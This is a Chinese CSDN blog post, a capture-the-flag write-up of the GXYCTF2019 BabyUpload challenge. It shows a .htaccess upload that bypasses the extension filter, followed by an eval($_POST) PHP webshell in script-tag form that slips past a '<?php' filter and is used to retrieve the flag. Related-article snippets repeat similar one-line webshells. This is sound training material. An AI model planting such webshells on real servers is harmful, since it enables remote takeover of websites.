文件上传---[GXYCTF2019]BabyUpload

最新推荐文章于 2024-05-19 14:29:37 发布
最新推荐文章于 2024-05-19 14:29:37 发布
阅读量193 收藏
点赞数 1
分类专栏: CTF系列问题 文章标签: 文件上传
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yzl_007/article/details/119832739
版权

与[MRCTF2020]你传你🐎呢
同样的思路上传.htaccess文件

在这里插入图片描述

/var/www/html/upload/43567605b935416b6c6175b4c1e8a3f1/.htaccess succesfully uploaded!

然后上传任意文件的木马即可

在这里插入图片描述

然而还是想的太简单

多试几次发现文件后缀名更改全是返回的同样的结果,猜想是文件内容的问题

在这里插入图片描述

这样修改后上传成功,估计是对<?php ?>有限制

改为html文件形式上传成功

<script language='php'> eval($_POST[sb]);</script>

在这里插入图片描述

pyload:http://00165135-d0b8-4031-a9dc-95f9539cf340.node4.buuoj.cn/upload/43567605b935416b6c6175b4c1e8a3f1/4.jpg

在这里插入图片描述

连接成功,找到flag

在这里插入图片描述

yyyyzzzllll
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-WEB[GXYCTF 2019]BabyUpload
02-08
CTF-WEB[GXYCTF 2019]BabyUpload
精美网页模版,橙色政府网站建设
05-09
模板介绍: 风格清晰大气,结构规整,内置工作流,信息签收、信息签发、互动交流等常用政府网站功能,相对其他模板,此模板增加了网站常用一些参数统计和投稿统计,主要功能全部采用自定义模型,可以任意扩展字段和...
[GXYCTF2019]BabyUpload
Yb_140的博客
09-10 86
过多的就不展示了,直接上payload。先上传一个.htaccess文件。然后上传一个jpeg文件。
html中文件上传储存到本地路径
XiaoLinZuoTi的博客
08-11 2154
这个的类型必须为 multipart/form-data =》 enctype=“multipart/form-data” , 这个才会将整个文件给传送到后端去,如果使用的是默认的编码类型,传输的则是文件的名称。上面的代码中,首先用MultipartFile对象去接受从网页传来的文件数据对象,获取到原始的文件名,保存在指定的路径之上,我们用uuid来做唯一标识,来作为文件名.其中后缀名用字符串中的一些方法获取.如果是上传文件的话,需要注意的是,提交方式必须是post =》 method=“post”。
文件上传(简单代码)
weixin_30378311的博客
08-17 162
12//*********************上传文件2.0********************************3protectedvoidButton1_Click(objectsender,EventArgse)4{56stringpath=Server.MapPath("~/image/");7...
[GXYCTF2019]BabyUpload-BUUTF
XiaoYeZhu_1314的博客
04-24 445
他过滤了<?,ph等。
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞
weixin_44632787的博客
06-19 1895
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞(.htaccess) 早上遇到一个文件解析漏洞,下午又遇到一个。。。。好吧,看来文件解析漏洞在CTF中也是很重要的一个知识点!!! 首先启动挑战项目 先正常的上传一句话木马: GIF89a? <script language="php">eval($_POST['zyh']);</script> 我经常用这样的一句话木马,为了防止php文件内容被过滤啥的… 所以,把传输的文件名改回1.pn
BUUCTF-[GXYCTF2019]BabyUpload
qq_43006864的博客
05-06 1164
直接开题。 上来就是一个文件上传。 这里随便传了几个文件测试,发现只能传入jpeg格式的文件。对文件名和文件类型都做了限制。 所以这里想到了之前用过了.htaccess。 传入.htaccess,格式修改为image/jpeg。 上传成功, 传入php探针进行测试,这里推荐直接上phtml格式的马子。 传入php探针,并执行成功,看来是没问题的。这里路径大家参考这个: http://84247058-8c5c-496d-b573-d01266658f00.node4.b...
[GXYCTF2019]BabyUpload1 -- 题目分析与详解
2302_79800344的博客
03-03 1514
代码中并没有写传统的一句话木马,因为直接写一句话木马需要关闭系统防火墙。.htaccess 文件。
BUUCTF---web---[GXYCTF2019]BabyUpload
最新发布
2201_75556700的博客
05-19 150
4、上传包含该内容的test.txt,之后bp抓包修改文件名为.htaccess。2、上传php提示不能上传ph后缀,直接上传正常格式的图片提示太露骨了。5、利用重放器发送修改后的内容,发现成功上传了,放行。3、这里可以利用.htaccess进行绕过。6、接下来上传一句话木马test1.jpg。8、页面没有提示是图片错误,用蚁剑链接。
【CTF】[GXYCTF 2019]BabyUpload
西原一点红的博客
06-19 863
说明是黑名单,且对上传的类型也做了校验。说明对上传的内容也做了校验。4. 修改上传内容绕过校验。
C#做的超市管理系统。
11-17
《C#实现的超市管理系统详解》 在信息技术日益发达的今天,各类管理系统已经渗透到各行各业,其中超市管理系统作为零售业的重要组成部分,对于提升运营效率、优化库存管理具有重要作用。本系统采用C#编程语言和SQL ...
[BUUCTF]-Basic-Upload-Labs-Linux
yzl_007的博客
08-27 5024
[BUUCTF]-Basic-Upload-Labs-Linux 打开环境地址,其实是upload-labs这个文件上传漏洞靶场,之前有文件已经介绍了各个关卡的通过技巧,这里给上链接 https://blog.csdn.net/yzl_007/article/details/119395730 然后这里演示一下第一关吧 禁用掉javascript,将划线部分删去 然后直接上传php一句话木马文件 返回地址 …/upload/shell.php 蚁剑连接 然后在根目录找到flag 可以每一关都尝试一下
【从0开始学web】78-88 文件包含
yzl_007的博客
10-14 3518
【从0开始学web】78-88 文件包含 文件包含题,可以先了解一下文件包含漏洞 https://blog.csdn.net/yzl_007/article/details/120261435 web78 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 10:52:43 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 10:54:2
curl_setopt 函数
yzl_007的博客
10-17 3498
curl_setopt 函数 php curl_setopt函数的作用是为一个CURL会话设置选项,其语法是“curl_setopt (int ch, string option, mixed value)”,参数“option”表示想要的设置。 三个参数分别的作用 ch 由 curl_init() 返回的 cURL 句柄。 option 需要设置的CURLOPT_XXX选项。 value 将设置在option选项上的值。 下面先看一个示例 //来源菜鸟教程,初始化一个新的cURL会话并获取一个网页 &lt
2021-深育杯misc - Login
yzl_007的博客
11-14 3117
Login 题目简介:这破网站为什么不能注册? 题目访问ip:3001 打开环境后是一个登陆窗口,但是没有账号 点击下方的获取示例有提示 下载下来一个提示文件后发现是个加密的压缩包 明显的明文攻击,修改伪加密文件,提取出示例 - 副本.txt,添加到压缩包,然后明文攻击解得密码为qwe@123 打开后发现password还是加密的,其中1.txt都是低字节6kb 压缩包短文本文件的crc32碰撞 https://github.com/theonlypwner/crc32 拼接起来就是welc0me_
upload-labs靶场1-21关一些思路
yzl_007的博客
08-04 2141
upload-labs靶场1-21关一些思路 1、js绕过,后缀名绕过 查看源码分析,允许上传的文件类型为.jpg|.png|.gif,可以抓包修改后上传 修改后缀为php即可 放包然后可以看到页面成功上传 返回了地址,下面就可以利用工具进行连接了。 这里看到地址 …/upload/2.php 这里…/是上一目录的意思 所以地址是http://ip/upload-labs/upload/2.php 口令是sb 用蚁剑连接如图,测试连接数据返回成功 然后点击添加成功查看目录并且能访问所以有权
ctfshow【从0开始学web】系列21-28 爆破
yzl_007的博客
10-07 1287
ctfshow【从0开始学web】系列21-28 爆破 web21 爆破什么的,都是基操 解码发现是base64加密的,解码后添加好§ 再设置有效载荷 Payload set ---->custom iterator(自定义迭代器)------>position 3------>输入字典 自定义迭代器可以自定义拼接方式,position的位置即为我们的拼接方式,根据上述base64解码的tomcat密码的格式:用户名:密码 ----->则position的位数为3 Positio
[GXYCTF2019]BabySQli 1
10-06
[GXYCTF2019]BabySQli1 是一个联合查询构建虚拟数据的例子。该例子中使用了base32和base64进行数据模糊化处理。在第二个引用中,通过联合查询构建了一个查询语句,将用户名设置为'1'并且选择了一个管理员账号和密码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值